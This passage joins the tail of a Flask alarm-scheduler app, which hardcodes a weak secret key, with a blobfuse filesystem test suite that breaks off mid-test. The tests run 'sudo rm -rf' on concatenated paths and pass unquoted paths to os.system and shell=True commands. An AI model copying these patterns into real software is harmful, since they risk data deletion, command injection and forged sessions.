# checks the date hasn't expired
if date_time <= datetime.now():
flash("Alarm of Event " + event_name + " at "
+ str(date_time.strftime("%d/%m/%Y %H:%M"))
+ " is in past!", 'error')
errorLogger.warning("Alarm of Event %s at %s is in past.",
event_name,
str(date_time.strftime("%d/%m/%Y %H:%M")))
return redirect(url_for('home'))
old_event_name = event_id
# checks if the event_name is unique
if event_name != old_event_name:
alarm = get_event(event_name)
if alarm:
flash("Alarm of Event " + event_name
+ " already exists when event change from "
+ old_event_name + "", 'error')
errorLogger.warning("Alarm of Event %s already exists "
"when change event change from %s.",
event_name, old_event_name)
return redirect(url_for('home'))
errorLogger.info("Updating Schedule for an event %s", event_name)
alarm = get_event(old_event_name)
event_sched = alarm[3]
# cancelling event
errorLogger.debug("Cancelling Schedule")
scheduler.cancel(event_sched)
alarms.remove(alarm)
# updating event
errorLogger.debug("Updating Schedule")
time_delay = time_difference(date_time)
event_sched = scheduler.enter(
time_delay, 1, set_notification,
argument=(str(date_time.strftime("%d/%m/%Y %H:%M")),
event_name, event_period))
temp_alarm.append(str(date_time.strftime("%d/%m/%Y %H:%M")))
temp_alarm.append(event_name)
temp_alarm.append(event_period)
temp_alarm.append(event_sched)
alarms.append(temp_alarm)
# Save alarms list into system log
eventLogger.critical("Alarms list : @%s", save_to_log(alarms))
errorLogger.info("Event change has been captured and recorded into"
" system log for UPDATE action.")
flash("Alarm of Event " + event_name + " has been updated "
"successfully", 'success')
errorLogger.info("Alarm of Event %s has been updated "
"successfully.", event_name)
return redirect(url_for('home'))
@app.route('/deleteAlarm/<string:event_id>', methods=['POST'])
def delete_alarm(event_id: str) -> redirect:
"""
Deleting alarm.
:param event_id: a string to indicate the id of the event.
:return:
"""
errorLogger.debug("DELETE ALARM")
alarm = get_event(event_id)
if alarm:
event_sched = alarm[3]
# deleting event
errorLogger.debug("Cancelling Schedule")
scheduler.cancel(event_sched)
alarms.remove(alarm)
# Save alarms list into system log
eventLogger.critical("Alarms list : @%s", save_to_log(alarms))
errorLogger.info("Event change has been captured and recorded "
"into system log for DELETE action.")
flash("Alarm of Event " + event_id + " has been removed "
"successfully", 'success')
errorLogger.info("Alarm of Event %s has been removed "
"successfully.", event_id)
else:
flash("Alarm of Event " + event_id
+ " is not exists for remove", 'error')
errorLogger.warning("Alarm of Event %s is not exists for "
"remove.", event_id)
return redirect(url_for('home'))
if __name__ == '__main__':
thread = threading.Thread(target=scheduler_event)
thread.setDaemon(True)
thread.start()
app.secret_key = 'super secret key'
app.config['SESSION_TYPE'] = 'filesystem'
restore_from_log()
app.run()
|
tests.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from subprocess import call
import os
import shutil
import time
import unittest
import errno
import random
import uuid
import threading
import stat
import subprocess
import shlex
import datetime
LOCAL_TEST = 0
ADLS_TEST = 0
print ("Local Testing Enabled : " + str(LOCAL_TEST))
'''
READ ME BEFORE RUNNING TESTS
1. Before running any test, mount blobfuse first
2. Change line 25 (variable blobdir) to the mounted container path you mounted
3. Change line 28 (variable localdir) to the local temp directory (You most likely don't need to change this)
4. Change line 31 (variable cachedir) to the designated cache directory used by blobfuse
Make sure your user has permissions to these folders you've designated and that the folders also
allow to be accessed by the tests (use chown and/or chmod)
HOW TO RUN TESTS:
$ python ./tests.py
(or replace 'tests.py' with the python test name)
use "-v" for details of each test as it runs (e.g. python ./tests.py -v)
To run individual tests or type of test add the class or class.methodtest in the command line
class: $python ./tests.py OpenFileTest
method: $python ./test.py OpenFileTest.test_open_file_nonexistent_file_read
'''
class BlobfuseTest(unittest.TestCase):
# Get the running instance of blobfuse
cmd_to_find = "ps -eo args | grep blobfuse | grep tmp-path"
blob_cmd = ""
blob_cmd = str(subprocess.check_output(cmd_to_find, shell=True))
#print (blob_cmd)
global LOCAL_TEST
global ADLS_TEST
x = blob_cmd.find("myblob")
if x > 1 :
LOCAL_TEST = 1
print ("Local Testing Enabled (due to command filter): " + str(LOCAL_TEST))
x = blob_cmd.find("adls=")
if x > 1 :
ADLS_TEST = 1
print ("ADLS TEsting Enabled (due to command filter): " + str(ADLS_TEST))
x = blob_cmd.find("/blobfuse")
if x > 1 :
blob_cmd = blob_cmd[x:]
print (blob_cmd)
blob_cmd_list = blob_cmd.split(" ")
blob_cmd_tmppath = [opt for opt in blob_cmd_list if opt.startswith("--tmp-path")]
# mounted container folder
blobdir = blob_cmd_list[1]
print ("Mount Dir : " + blobdir)
# local temp directory
localdir = "/mnt/tmp"
# designated folder for the cache
if (len(blob_cmd_tmppath) >= 1) :
cachedir = blob_cmd_tmppath[0].split("=")[1]
print ("Cache Dir : " + cachedir)
else :
cachedir = "/mnt/blobfusetmp"
# folder within mounted container
blobstage = ""
def setUp(self):
print (" >> ", self._testMethodName)
self.blobstage = os.path.join(self.blobdir, "testing")
if not os.path.exists(self.localdir):
os.system("sudo mkdir " + self.localdir)
#os.system("sudo chown -R `whoami` " + self.localdir)
#os.system("sudo chmod 777 " + self.localdir)
if not os.path.exists(self.blobstage):
os.system("sudo mkdir " + self.blobstage)
#os.system("sudo chown -R `whoami` " + self.blobstage)
#os.system("sudo chmod 777 " + self.blobstage)
def tearDown(self):
if os.path.exists(self.blobstage):
os.system("sudo rm -rf " + self.blobstage + "/*")
#shutil.rmtree(self.blobstage)
if os.path.exists(self.localdir):
os.system("sudo rm -rf " + self.localdir + "/*")
# helper functions
def validate_dir_removal(self, dirPath, dirName, parentDir):
with self.assertRaises(OSError) as e:
os.stat(dirPath)
self.assertEqual(e.exception.errno, errno.ENOENT)
homeDir = os.getcwd()
with self.assertRaises(OSError) as e:
os.chdir(dirPath)
self.assertEqual(e.exception.errno, errno.ENOENT)
os.chdir(homeDir)
entries = os.listdir(parentDir)
self.assertFalse(dirName in entries)
# validates directory was created
def validate_dir_creation(self, dirpath, dirName, parentDir):
os.stat(dirpath) # As long as this does not raise a FileNotFoundError, we are satisfied
# Save values to move back to where we started and build testDir absolute path
homeDir = os.getcwd()
os.chdir(parentDir)
parentDirAbsolute = os.getcwd()
# Test that we can successfully move into the dir
os.chdir(dirName)
self.assertEqual(os.path.join(parentDirAbsolute, dirName), os.getcwd())
# Test that we see the subdir when listing the current dir
os.chdir("..")
dir_entries = os.listdir(parentDirAbsolute)
self.assertTrue(len(dir_entries) == 1)
self.assertTrue(dirName in dir_entries)
# Return to the test dir to continue with other tests
os.chdir(homeDir)
# validates file was removed
def validate_file_removal(self, filePath, fileName, parentDir):
with self.assertRaises(OSError) as e:
os.stat(filePath)
self.assertEqual(e.exception.errno, errno.ENOENT)
entries = os.listdir(parentDir)
self.assertFalse(fileName in entries)
# validates file was created
def validate_file_creation(self, filePath, fileName, parentDir):
os.stat(filePath) # As long as this doesn't fail, we are satisfied
# print(os.stat(testFilePath))
entries = os.listdir(parentDir)
self.assertTrue(fileName in entries)
# reads from file
def read_file_func(self, filePath, start, end, testData):
fd = os.open(filePath, os.O_RDONLY)
os.lseek(fd, start, os.SEEK_SET)
data = os.read(fd, end - start)
self.assertEqual(data.decode(), testData[start:end])
os.close(fd)
# writes to file
def write_file_func(self, filePath, data):
fd = os.open(filePath, os.O_WRONLY | os.O_APPEND)
os.write(fd, data.encode())
os.close(fd)
class RenameTests(BlobfuseTest):
# renames empty file within the same directory
def test_rename_file_same_dir(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
testFileNewName = "testFileMoved"
testFileNewPath = os.path.join(self.blobstage, testFileNewName)
fd = os.open(testFilePath, os.O_CREAT)
os.close(fd)
os.system("mv " + testFilePath + " " + testFileNewPath)
#os.rename(testFilePath, testFileNewPath)
with self.assertRaises(OSError) as e:
os.stat(testFilePath)
self.validate_file_removal(testFilePath, testFileName, self.blobstage)
self.validate_file_creation(testFileNewPath, testFileNewName, self.blobstage)
os.remove(testFileNewPath)
# moves/renames empty file to another directory
def test_rename_file_change_dir(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
destFilePath = os.path.join(testDirPath, testFileName)
os.mkdir(testDirPath)
fd = os.open(testFilePath, os.O_CREAT)
os.close(fd)
os.system("mv " + testFilePath + " " + destFilePath)
#os.rename(testFilePath, destFilePath)
self.validate_file_removal(testFilePath, testFileName, self.blobstage)
self.validate_file_creation(destFilePath, testFileName, testDirPath)
os.remove(destFilePath)
os.rmdir(testDirPath)
# renames nonempty file
def test_rename_file_non_empty(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
destFileName = "newFile"
destFilePath = os.path.join(self.blobstage, destFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
testData = "test data"
os.write(fd, testData.encode())
os.close(fd)
os.system("mv " + testFilePath + " " + destFilePath)
#os.rename(testFilePath, destFilePath)
fd = os.open(destFilePath, os.O_RDONLY)
data = os.read(fd, 20)
self.assertEqual(data.decode(), testData)
os.remove(destFilePath)
# renames subdirectory in the same parent directory
def test_rename_dir(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
destDirName = "NewDir"
destDirPath = os.path.join(self.blobstage, destDirName)
os.mkdir(testDirPath)
os.rename(testDirPath, destDirPath)
self.validate_dir_removal(testDirPath, testDirName, self.blobstage)
self.validate_dir_creation(destDirPath, destDirName, self.blobstage)
os.rmdir(destDirPath)
# renames/moves empty subdirectory to a different parent directory
def test_rename_dir_change_dir(self):
testDirParent = "ParentDir"
parentDirPath = os.path.join(self.blobstage, testDirParent)
destParentDir = "ParentDest"
destParentPath = os.path.join(self.blobstage, destParentDir)
testDirName = "TestDir"
testDirPath = os.path.join(parentDirPath, testDirName)
destDirPath = os.path.join(destParentPath, testDirName)
os.mkdir(parentDirPath)
os.mkdir(testDirPath)
os.mkdir(destParentPath)
os.rename(testDirPath, destDirPath)
self.validate_dir_removal(testDirPath, testDirName, parentDirPath)
self.validate_dir_creation(destDirPath, testDirName, destParentPath)
os.rmdir(destDirPath)
os.rmdir(destParentPath)
os.rmdir(parentDirPath)
# renames nonempty directory within same parent directory
def test_rename_dir_nonempty(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "testFile"
testFilePath = os.path.join(testDirPath, testFileName)
destDirName = "newDirName"
destDirPath = os.path.join(self.blobstage, destDirName)
os.mkdir(testDirPath)
fd = os.open(testFilePath, os.O_CREAT)
os.rename(testDirPath, destDirPath)
with self.assertRaises(OSError) as e:
os.stat(testFilePath)
self.assertEqual(e.exception.errno, errno.ENOENT)
os.stat(os.path.join(destDirPath, testFileName))
os.close(fd)
os.remove(os.path.join(destDirPath, testFileName))
os.rmdir(destDirPath)
# Attempts to rename a directory that doesn't exist, expect error
def test_rename_no_directory(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
destDirName = "newDirName"
destDirPath = os.path.join(self.blobstage, destDirName)
with self.assertRaises(OSError) as e:
os.rename(testDirPath, destDirPath)
self.assertEqual(e.exception.errno, errno.ENOENT)
# Attempts to rename a file that doesn't exist, expect error
def test_rename_no_file(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "testFile"
testFilePath = os.path.join(testDirPath, testFileName)
testNewFileName = "testFile2"
testNewFilePath = os.path.join(testDirPath, testNewFileName)
os.mkdir(testDirPath)
with self.assertRaises(OSError) as e:
os.rename(testFilePath, testNewFilePath)
self.assertEqual(e.exception.errno, errno.ENOENT)
os.rmdir(testDirPath)
# test to rename directory to an existing directory
def test_rename_dir_change_dir(self):
testDirParent = "ParentDir"
parentDirPath = os.path.join(self.blobstage, testDirParent)
destParentDir = "ParentDest"
destParentPath = os.path.join(self.blobstage, destParentDir)
testDirName = "TestDir"
testDirPath = os.path.join(parentDirPath, testDirName)
destDirPath = os.path.join(destParentPath, testDirName)
os.mkdir(parentDirPath)
os.mkdir(testDirPath)
os.mkdir(destParentPath)
os.rename(testDirPath, destDirPath)
self.validate_dir_removal(testDirPath, testDirName, parentDirPath)
self.validate_dir_creation(destDirPath, testDirName, destParentPath)
os.rmdir(destDirPath)
os.rmdir(destParentPath)
os.rmdir(parentDirPath)
class ReadWriteFileTests(BlobfuseTest):
# test to write to a blob and read from it (regular ascii)
def test_WriteReadSingleFile(self):
file1txt = "Some file1 text here."
filepath = os.path.join(self.blobstage, "file1");
with open(filepath, 'w') as file1blob:
file1blob.write(file1txt)
self.assertEqual(True, os.path.exists(filepath))
with open(filepath, 'r') as file1blob:
file1txtrt = file1blob.read()
self.assertEqual(file1txt, file1txtrt)
os.remove(filepath)
self.assertEqual(False, os.path.exists(filepath))
# test to write to a blob and read from it (unicode)
def test_WriteReadSingleFileUnicode(self):
file1txt = "}L"
filepath = os.path.join(self.blobstage, ",: hello?world-we^areall~together1 .txt");
#with open(filepath, 'w') as file1blob:
# file1blob.write(file1txt)
cmd_str = "echo \"" + file1txt + "\" > \"" + filepath + "\""
os.system(cmd_str)
self.assertEqual(True, os.path.exists(filepath))
with open(filepath, 'r') as file1blob:
file1txtrt = file1blob.read()
self.assertEqual(file1txt +"\n", file1txtrt)
os.remove(filepath)
self.assertEqual(False, os.path.exists(filepath))
# test to overwrite file from beginning
def test_write_file_overwrite_beginning(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_RDWR)
testData = "test data"
os.write(fd, testData.encode())
os.lseek(fd, 0, os.SEEK_SET)
testData = "overwrite all"
os.write(fd, testData.encode())
os.lseek(fd, 0, os.SEEK_SET)
data = os.read(fd, 20)
self.assertEqual(data.decode(), testData)
os.close(fd)
os.remove(testFilePath)
# test to append to a file that already has data
def test_write_file_append_to_end(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
testData = "test data"
os.write(fd, testData.encode())
os.close(fd)
fd = os.open(testFilePath, os.O_WRONLY | os.O_APPEND)
moreData = "more data"
os.write(fd, moreData.encode())
os.close(fd)
fd = os.open(testFilePath, os.O_RDONLY)
data = os.read(fd, 30)
self.assertEqual(data.decode(), testData + moreData)
os.close(fd)
os.remove(testFilePath)
# test to make medium sized blobs
# this test takes around 10 - 20 minutes
def test_medium_files(self):
mediumBlobsSourceDir = os.path.join(self.blobstage, "srcmediumblobs")
if not os.path.exists(mediumBlobsSourceDir):
os.makedirs(mediumBlobsSourceDir);
if LOCAL_TEST :
N = 2
else :
N = 10
for i in range(0, N):
filename = str(uuid.uuid4())
filepath = os.path.join(mediumBlobsSourceDir, filename)
if LOCAL_TEST :
os.system("head -c 1M < /dev/zero >> " + filepath);
else :
os.system("head -c 1M < /dev/urandom > " + filepath);
os.system("head -c 200M < /dev/zero >> " + filepath);
os.system("head -c 10M < /dev/urandom >> " + filepath);
files = os.listdir(mediumBlobsSourceDir)
self.assertEqual(N, len(files))
localBlobDir = os.path.join(self.localdir, "localmediumblobs")
shutil.copytree(mediumBlobsSourceDir, localBlobDir)
files = os.listdir(localBlobDir)
self.assertEqual(N, len(files))
mediumBlobsDestDir = os.path.join(self.blobstage, "destmediumblobs")
os.system("cp -R " + localBlobDir + " " + mediumBlobsDestDir)
files = os.listdir(mediumBlobsDestDir)
self.assertEqual(N, len(files))
class StatsTests(BlobfuseTest):
# test to check the stats of a directory, a file, and a nonexistent file(expect error here)
def test_filesystem_stats(self):
testDir = os.path.join(self.blobstage, "testDirectory")
testFile = os.path.join(testDir, "file1")
testNonexistingFile = os.path.join(testDir, "file2")
os.makedirs(testDir)
with open(testFile, 'w') as fileblob:
fileblob.write("Dummy file")
dirResult = os.statvfs(testDir)
fileResult = os.statvfs(testFile)
self.assertNotEqual(dirResult.f_bavail, 0)
self.assertNotEqual(fileResult.f_bavail, 0)
try:
noResult = os.statvfs(testNonexistingFile)
except OSError as e:
self.assertEqual(e.errno, errno.ENOENT)
os.system("sudo rm -rf " + testDir)
# test to check the stats of a file
def test_stat_file(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
# fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
f = open(testFilePath, "w")
testData = "test data"
# os.write(fd, testData.encode())
f.write(testData)
f.close()
self.assertEqual(os.stat(testFilePath).st_size, len(testData))
os.remove(testFilePath)
# test to check the stats of a directory
def test_stat_dir(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
self.assertEqual(os.stat(testDirPath).st_size, 4096) # The minimum directory size on Linux
os.rmdir(testDirPath)
# test if stat updates after each write operation and check contents as well
def test_write_stat_operations(self):
testFilePath = os.path.join(self.blobstage, "testfile")
data1000 = bytearray(os.urandom(1000))
data500 = bytearray(os.urandom(500))
with open(testFilePath, 'wb') as testFile:
testFile.write(data1000)
self.assertEqual(1000, os.stat(testFilePath).st_size)
with open(testFilePath, 'rb') as testFile:
contents = testFile.read()
self.assertEqual(data1000, contents)
with open(testFilePath, 'ab') as testFile:
testFile.write(data500)
self.assertEqual(1500, os.stat(testFilePath).st_size)
with open(testFilePath, 'rb') as testFile:
contents = testFile.read()
self.assertEqual(data1000 + data500, contents)
with open(testFilePath, 'wb') as testFile:
testFile.write(data500)
self.assertEqual(500, os.stat(testFilePath).st_size)
with open(testFilePath, 'rb') as testFile:
contents = testFile.read()
self.assertEqual(data500, contents)
# check fileowner and timestamp on file
def test_file_owner_timestamp(self):
testFileName = "testUserAndTime"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_RDONLY)
testData = "random data"
self.write_file_func(testFilePath, testData)
os.close(fd)
# This verifies the getattr from the local cache
fileowner = os.stat(testFilePath).st_uid
filegroup = os.stat(testFilePath).st_gid
time_of_upload = os.stat(testFilePath).st_mtime
self.assertTrue(fileowner == os.getuid() or os.getuid() == 0)
self.assertTrue(filegroup == os.getgid() or os.getuid() == 0)
#self.assertEqual(fileowner, os.getuid())
#self.assertEqual(filegroup, os.getgid())
# This removes the cached entries of the files just created, so they are on the service but not local.
shutil.rmtree(self.cachedir + '/root/testing/')
time.sleep(1)
# check whether getattr from the service is working
fileowner = os.stat(testFilePath).st_uid
filegroup = os.stat(testFilePath).st_gid
blob_last_modified = os.stat(testFilePath).st_mtime
self.assertTrue(fileowner == os.getuid() or os.getuid() == 0)
self.assertTrue(filegroup == os.getgid() or os.getuid() == 0)
diff = int(blob_last_modified) - int(time_of_upload)
self.assertLess(diff, (2 * 60))
#self.assertEqual(int(time_of_upload), int(blob_last_modified))
# prime the cache and check the attributes again
fd = os.open(testFilePath, os.O_RDONLY)
# check whether getattr from the cache is working
fileowner = os.stat(testFilePath).st_uid
filegroup = os.stat(testFilePath).st_gid
file_last_modified = os.stat(testFilePath).st_mtime
self.assertTrue(fileowner == os.getuid() or os.getuid() == 0)
self.assertTrue(filegroup == os.getgid() or os.getuid() == 0)
diff = int(blob_last_modified) - int(time_of_upload)
self.assertLess(diff, (2 * 60))
#self.assertEqual(int(time_of_upload), int(file_last_modified))
os.close(fd)
os.remove(testFilePath)
# TODO: fix empty folder creation with incorrect date, test does not pass
def test_stat_empty_dir_timestamp(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
currentTime = datetime.datetime.now()
dirStat = os.stat(testDirPath)
# Empty directory dates are coming to be 1970 only so no point in testing this out fo rnow
#self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_ATIME]))
#self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_MTIME]))
#self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_CTIME]))
shutil.rmtree(testDirPath)
# test to see if directory timestamp gets updated when a file is made, file and directory should have same timestamp
def test_stat_file_dir_timestamp(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
testFileName = "testUserAndTime"
testFilePath = os.path.join(testDirPath, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
os.close(fd)
currentTime = datetime.datetime.now()
dirStat = os.stat(testDirPath)
fileStat = os.stat(testFilePath)
diff = int(currentTime.strftime("%s")) - dirStat[stat.ST_ATIME]
self.assertLess(diff, (2 * 60))
#self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_ATIME]))
diff = int(currentTime.strftime("%s")) - dirStat[stat.ST_MTIME]
self.assertLess(diff, (2 * 60))
#self.assertEqual(currentTime.strftime("%c"), time.ctime(dirStat[stat.ST_MTIME]))
diff = int(currentTime.strftime("%s")) - fileStat[stat.ST_ATIME]
self.assertLess(diff, (2 * 60))
#self.assertEqual(currentTime.strftime("%c"), time.ctime(fileStat[stat.ST_ATIME]))
diff = int(currentTime.strftime("%s")) - fileStat[stat.ST_MTIME]
self.assertLess(diff, (2 * 60))
#self.assertEqual(currentTime.strftime("%c"), time.ctime(fileStat[stat.ST_MTIME]))
diff = int(currentTime.strftime("%s")) - fileStat[stat.ST_CTIME]
self.assertLess(diff, (2 * 60))
#self.assertEqual(currentTime.strftime("%c"), time.ctime(fileStat[stat.ST_CTIME]))
os.remove(testFilePath)
shutil.rmtree(testDirPath)
class OpenFileTests(BlobfuseTest):
# attempts to read file that doesn't exist, expect error
def test_open_file_nonexistent_file_read(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
with self.assertRaises(OSError) as e:
os.open(testFilePath, os.O_RDONLY)
self.assertEqual(e.exception.errno, errno.ENOENT)
# attempts to write to a file that doesn't exist, expect error
def test_open_file_nonexistent_file_write(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
with self.assertRaises(OSError) as e:
os.open(testFilePath, os.O_WRONLY)
self.assertEqual(e.exception.errno, errno.ENOENT)
# test open an empty file in write only, write to it, close it
# reopen the file in read only to check if we can read the contents
def test_open_file_exists_read_write_empty(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY) # This covers opening a file that exists and is empty
testData = "Test data"
os.write(fd, testData.encode())
os.close(fd) # It would be possible to seek, but that should be a separate test. Reoping is more granular
fd = os.open(testFilePath, os.O_CREAT | os.O_RDONLY)
data = os.read(fd, 15)
self.assertEqual(data.decode(), testData)
os.close(fd)
os.remove(testFilePath)
# create/open file in write only, then try to read from it and expect an error
# then open the file in read only and attempt to write to it and expect an error
def test_open_file_read_only_write_only(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
testData = "Test data"
os.write(fd, testData.encode())
with self.assertRaises(OSError) as e:
os.read(fd, 20)
self.assertEqual(e.exception.errno, errno.EBADF)
os.close(fd)
# This also tests opening a non-empty file and a file that was closed
fd = os.open(testFilePath, os.O_RDONLY)
with self.assertRaises(OSError) as e:
os.write(fd, testData.encode())
self.assertEqual(e.exception.errno, errno.EBADF)
data = os.read(fd, 20)
self.assertEqual(data.decode(), testData)
os.close(fd)
os.remove(testFilePath)
# test if we can open the same file in write only, then in read only then using the
# respective file handles, read and write to the file
def test_open_file_already_open(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
fd2 = os.open(testFilePath, os.O_CREAT | os.O_RDONLY)
testData = "test data"
os.write(fd, testData.encode())
data = os.read(fd2, 20)
self.assertEqual(data.decode(), testData)
os.close(fd)
os.close(fd2)
os.remove(testFilePath)
# expect an error if we try to open a directory path
def test_open_dir_exists(self):
# expect failure
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
with self.assertRaises(OSError) as e:
fd = os.open(testDirPath, os.O_CREAT | os.O_RDWR)
self.assertEqual(e.exception.errno, errno.EISDIR)
os.rmdir(testDirPath)
class CloseFileTests(BlobfuseTest):
# helper function for closing file through a process/thread
def close_file_func(self, filePath):
fd = os.open(filePath, os.O_RDONLY)
os.close(fd)
# opening a file after another process opened it
def test_read_file_after_another_process_closes(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_RDWR)
testData = "test data"
os.write(fd, testData.encode())
os.lseek(fd, 0, os.SEEK_SET)
thread = threading.Thread(target=self.close_file_func, args=(testFilePath,))
thread.start()
thread.join()
data = os.read(fd, 20)
self.assertEqual(data.decode(), testData)
os.close(fd)
os.remove(testFilePath)
# test file after we opened it, expect error when we try to write to a file that's closed
def test_close_file(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
os.close(fd)
with self.assertRaises(OSError) as e:
os.write(fd, "data".encode())
self.assertEqual(e.exception.errno, errno.EBADF)
os.remove(testFilePath)
# test file after we opened it, closed it and expect an error after we try to close it again
def test_close_file_twice(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
os.close(fd)
with self.assertRaises(OSError) as e:
os.close(fd)
self.assertEqual(e.exception.errno, errno.EBADF)
os.remove(testFilePath)
class RemoveFileTests(BlobfuseTest):
# test if we can remove a file
def test_remove_file(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
f = os.open(testFilePath, os.O_CREAT)
os.close(f)
os.remove(testFilePath)
self.validate_file_removal(testFilePath, testFileName, self.blobstage)
# test if we can remove a file that's still open
def test_remove_file_still_open(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
f = os.open(testFilePath, os.O_CREAT)
os.remove(testFilePath)
self.validate_file_removal(testFilePath, testFileName, self.blobstage)
# expect an error if we try to remove a file that doesn't exist
def test_remove_nonexistent(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
# throw exception here, expect OSError
with self.assertRaises(OSError) as e:
os.remove(testFilePath)
self.assertEqual(e.exception.errno, errno.ENOENT)
self.validate_file_removal(testFilePath, testFileName, self.blobstage)
# expect an error if we try to remove a file that has already been removed
def test_remove_file_twice(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
f = os.open(testFilePath, os.O_CREAT)
os.close(f)
os.remove(testFilePath)
self.validate_file_removal(testFilePath, testFileName, self.blobstage)
# throw exception here, expect OSError
with self.assertRaises(OSError) as e:
os.remove(testFilePath)
self.assertEqual(e.exception.errno, errno.ENOENT)
self.validate_file_removal(testFilePath, testFileName, self.blobstage)
class TruncateTests(BlobfuseTest):
# test if we can truncate a file
def test_truncate_file(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
os.write(fd, "random data".encode())
os.ftruncate(fd, 0)
os.close(fd)
self.assertEqual(os.stat(testFilePath).st_size, 0)
os.remove(testFilePath)
# test if we can truncate a file and if we can read from it and open it and truncate it again
def test_truncate_file_non_zero(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
os.write(fd, "random data".encode())
os.ftruncate(fd, 5)
os.close(fd)
self.assertEqual(os.stat(testFilePath).st_size, 5)
with open(testFilePath, 'rb') as testFile:
contents = testFile.read()
self.assertEqual("rando".encode(), contents)
fd = os.open(testFilePath, os.O_RDWR)
os.ftruncate(fd, 30)
os.close(fd)
self.assertEqual(os.stat(testFilePath).st_size, 30)
os.remove(testFilePath)
# test to truncate an empty file
def test_truncate_empty_file(self):
# dunno if should expecting error here or not
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
os.ftruncate(fd, 0)
os.close(fd)
self.assertEqual(os.stat(testFilePath).st_size, 0)
os.remove(testFilePath)
class ThreadTests(BlobfuseTest):
# test if we can read from the same file at the same time with multiple processes
def test_file_simultaneous_read(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY)
testData = "Plenty of data for simultaneous reads"
os.write(fd, testData.encode())
os.close(fd)
thread1 = threading.Thread(target=self.read_file_func, args=(testFilePath, 0, 10, testData,))
thread2 = threading.Thread(target=self.read_file_func, args=(testFilePath, 10, 20, testData,))
thread3 = threading.Thread(target=self.read_file_func, args=(testFilePath, 20, len(testData), testData,))
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
os.remove(testFilePath)
# tests if we can write to the same file with multiple threads
def test_file_simultaneous_write(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_RDONLY)
testData = "random data"
thread1 = threading.Thread(target=self.write_file_func, args=(testFilePath, testData))
thread2 = threading.Thread(target=self.write_file_func, args=(testFilePath, testData))
thread3 = threading.Thread(target=self.write_file_func, args=(testFilePath, testData))
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
self.assertEqual(os.stat(testFilePath).st_size, len(testData) * 3)
os.close(fd)
os.remove(testFilePath)
def test_multiple_file_handles_on_single_file(self):
# This is to test whether close of a file handle impacts other open file handles on the same file
# reported in issue 57
testFileName = "testFile_new" + str(random.randint(0, 10000))
testFilePath = os.path.join(self.blobstage, testFileName)
repeat = random.randint(1, 10)
fd1 = os.open(testFilePath, os.O_WRONLY | os.O_CREAT)
fd2 = os.open(testFilePath, os.O_WRONLY)
os.close(fd2)
# sleep until cache times out
# TODO: Improve test execution time by reducing cache timeout
time.sleep(130)
testData = "random data"
for i in range(0, repeat):
